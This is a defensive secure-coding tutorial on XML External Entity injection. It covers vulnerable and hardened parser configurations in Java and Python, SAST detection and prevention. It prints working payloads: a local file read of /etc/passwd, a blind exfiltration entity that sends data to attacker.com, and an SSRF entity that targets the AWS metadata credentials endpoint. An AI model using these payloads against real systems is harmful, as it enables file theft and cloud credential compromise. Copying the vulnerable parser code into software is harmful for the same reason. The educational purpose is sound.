XXE Injection (XML External Entity): How It Works and How to Block It

What XXE Is

XML External Entity (XXE) injection is a vulnerability in applications that parse XML input. The XML specification includes a feature called "external entities" — a way to reference content from an external source (a URL or local file path) and include it inline in the document. When an XML parser processes attacker-controlled XML and external entity processing is enabled, the attacker can use this feature to read local files, trigger server-side requests, and in some cases exfiltrate data out of band.

The vulnerability exists because enabling external entity processing is often the default behaviour of XML parsers, not a feature you have to opt into. Developers working with XML rarely think about it — they're focused on parsing the data, not on what the parser does with DOCTYPE declarations.

OWASP history: XXE was its own category (A04) in the OWASP Top 10 2017. In 2021 it was merged into Security Misconfiguration (A05), reflecting that XXE is fundamentally a case of an insecurely configured parser.

How XXE Attacks Work

XML documents can include a DOCTYPE declaration that defines entities — essentially named variables you can reference in the document body. External entities reference content from a URI:

                xxe_payload.xml
                XML
              
<!-- XXE payload — defines an external entity pointing to a local file -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When an insecure parser processes this, it fetches the contents of /etc/passwd and substitutes it as the value of &xxe;. If the application echoes back the parsed value in the response, the attacker sees the file contents directly.

Classic File Read Attack

Here's what a vulnerable Java endpoint looks like — and what an attacker sends to it:

                XmlProcessor.java (vulnerable)
                Java
              
import javax.xml.parsers.*;
import org.w3c.dom.*;

// Vulnerable — uses default DocumentBuilderFactory with external entities enabled
public Document parseXml(InputStream input) throws Exception {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    // Missing: feature flags to disable external entities
    DocumentBuilder db = dbf.newDocumentBuilder();
    return db.parse(input);
}

                vulnerable_parser.py
                Python
              
from lxml import etree

# Vulnerable — lxml with resolve_entities=True (non-default but sometimes set)
def parse_xml(xml_input: bytes):
    parser = etree.XMLParser(resolve_entities=True)
    return etree.fromstring(xml_input, parser)

# Also vulnerable — stdlib xml.etree.ElementTree is safe by default
# but xml.sax and xml.dom.minidom are NOT — they process external entities
import xml.sax
# xml.sax.parseString(attacker_xml, handler)  <-- vulnerable

We've seen this in SOAP services: Legacy Java SOAP endpoints are a hotspot for XXE. The WSDL-generated code often uses the default DocumentBuilderFactory, and nobody has updated it since the service was written in 2012. If your org has old Java web services, they're worth auditing first.

Blind XXE via DNS Exfiltration

Often the application doesn't echo back the parsed XML — but XXE can still be exploited using out-of-band techniques. The attacker references an external URI under their control and uses DNS lookups to exfiltrate data:

                blind_xxe.xml
                XML
              
<!-- Blind XXE — exfiltrates data via DNS lookup -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
    'http://attacker.com/?x=%file;'>">
  %eval;
  %exfil;
]>
<root><data>test</data></root>

The attacker watches their DNS server logs for incoming queries. The hostname value gets encoded into the subdomain of the request. No response body needed from the app — the data arrives out of band.

XXE to SSRF

Instead of using a file:// URL, the attacker can use http:// URLs to trigger server-side requests. This turns XXE into SSRF — the server fetches attacker-specified internal URLs:

                xxe_ssrf.xml
                XML
              
<!-- XXE as SSRF — scans internal network / hits metadata service -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>

On AWS, this hits the EC2 instance metadata service and can retrieve IAM credentials attached to the instance. Combined with verbose responses, this is a full cloud credential compromise.

Which Languages and Parsers Are Vulnerable

External entity processing is a parser-level feature, so the vulnerability depends on which parser you use and how it's configured:

Java: DocumentBuilderFactory, SAXParserFactory, XMLInputFactory — all enable external entities by default
Python: xml.sax and xml.dom.minidom are vulnerable; xml.etree.ElementTree and lxml (with default settings) are safe
PHP: simplexml_load_string(), DOMDocument — vulnerable by default in older PHP versions
Node.js: libxmljs with noent: true is vulnerable; most Node XML parsers are safer by default
.NET: XmlDocument and XmlTextReader — vulnerable in some configurations prior to .NET 4.5.2

SVG uploads are an XXE vector: SVG files are XML. If your app accepts SVG uploads and parses them server-side (for preview generation, sanitisation, etc.) without disabling external entities, it's vulnerable to XXE from uploaded files. This catches a lot of teams off guard.

How to Disable External Entity Processing

                XmlProcessor.java (fixed)
                Java
              
// Fixed Java — disable all external entity features
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(input);

                safe_parser.py
                Python
              
from lxml import etree
from defusedxml import ElementTree

# Option 1: Use defusedxml — drop-in safe replacement for stdlib XML
tree = ElementTree.fromstring(xml_input)

# Option 2: lxml with safe parser config
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
)
root = etree.fromstring(xml_input, parser)

defusedxml for Python: The defusedxml library wraps Python's XML parsers and disables all known attack vectors by default — XXE, billion laughs, quadratic blowup. It's a drop-in replacement for xml.etree.ElementTree, xml.sax, etc. Just install and swap the import.

Detecting XXE with SAST

XXE is a good candidate for SAST because the vulnerability is about parser configuration — detectable code patterns rather than runtime behaviour. SAST tools look for:

Use of DocumentBuilderFactory, SAXParserFactory, or XMLInputFactory without the hardening feature flags
xml.sax.parseString() or xml.dom.minidom.parseString() calls without defusedxml
PHP's simplexml_load_string() or DOMDocument->loadXML() without LIBXML_NOENT disabled
SVG or document upload handling that routes to XML parsing without validation

Prevention Checklist

Disable DOCTYPE declarations entirely — if your XML doesn't use DTDs, block them at the parser level
Disable external general and parameter entities — use the feature flags for your language's parser
Use defusedxml in Python — it handles all the edge cases
Use simpler data formats — if JSON works for your use case, use JSON; it doesn't have this class of problem
Treat SVG uploads as XML — parse them with a hardened parser or sanitise server-side
Run SAST in CI — catch unsafe parser instantiation before code ships
Network-level controls as defence in depth — block outbound HTTP/DNS from app servers where possible to limit out-of-band exfiltration

XXE Injection (XML External Entity):How It Works and How to Block It